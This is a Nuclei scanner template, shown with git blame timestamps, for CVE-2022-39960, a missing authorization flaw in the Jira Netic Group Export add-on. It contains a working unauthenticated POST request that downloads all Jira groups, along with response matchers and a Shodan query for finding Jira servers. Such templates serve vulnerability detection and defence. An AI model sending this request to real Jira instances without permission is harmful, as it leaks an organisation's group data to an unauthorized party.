nuclei-templates/http/cves/2022/CVE-2022-39960.yaml

56 lines
1.8 KiB
YAML
Raw Normal View History

2022-09-18 04:07:10 +00:00
id: CVE-2022-39960
info:
name: Jira Netic Group Export <1.0.3 - Missing Authorization
2022-09-18 04:07:10 +00:00
author: For3stCo1d
severity: medium
2022-09-18 04:07:10 +00:00
description: |
Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-09-18 04:07:10 +00:00
reference:
- https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
- https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
2022-09-18 12:28:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-39960
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-39960
cwe-id: CWE-862
cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:*:*:*
epss-score: 0.3157
2022-09-18 04:07:10 +00:00
metadata:
max-request: 1
2022-09-18 04:07:10 +00:00
shodan-query: http.component:"Atlassian Jira"
2023-06-04 08:13:42 +00:00
verified: true
2022-09-18 12:28:39 +00:00
tags: cve,cve2022,atlassian,jira,netic,unauth
2022-09-18 04:07:10 +00:00
http:
2022-09-18 04:07:10 +00:00
- raw:
- |
POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groupexport_searchstring=&groupexport_download=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jiraGroupObjects"'
- '"groupName"'
condition: and
- type: word
part: header
words:
2022-09-18 12:33:37 +00:00
- "attachment"
- "jira-group-export"
2022-09-18 12:28:39 +00:00
condition: and
2022-09-18 04:07:10 +00:00
- type: status
status:
- 200
# Enhanced by md on 2023/04/10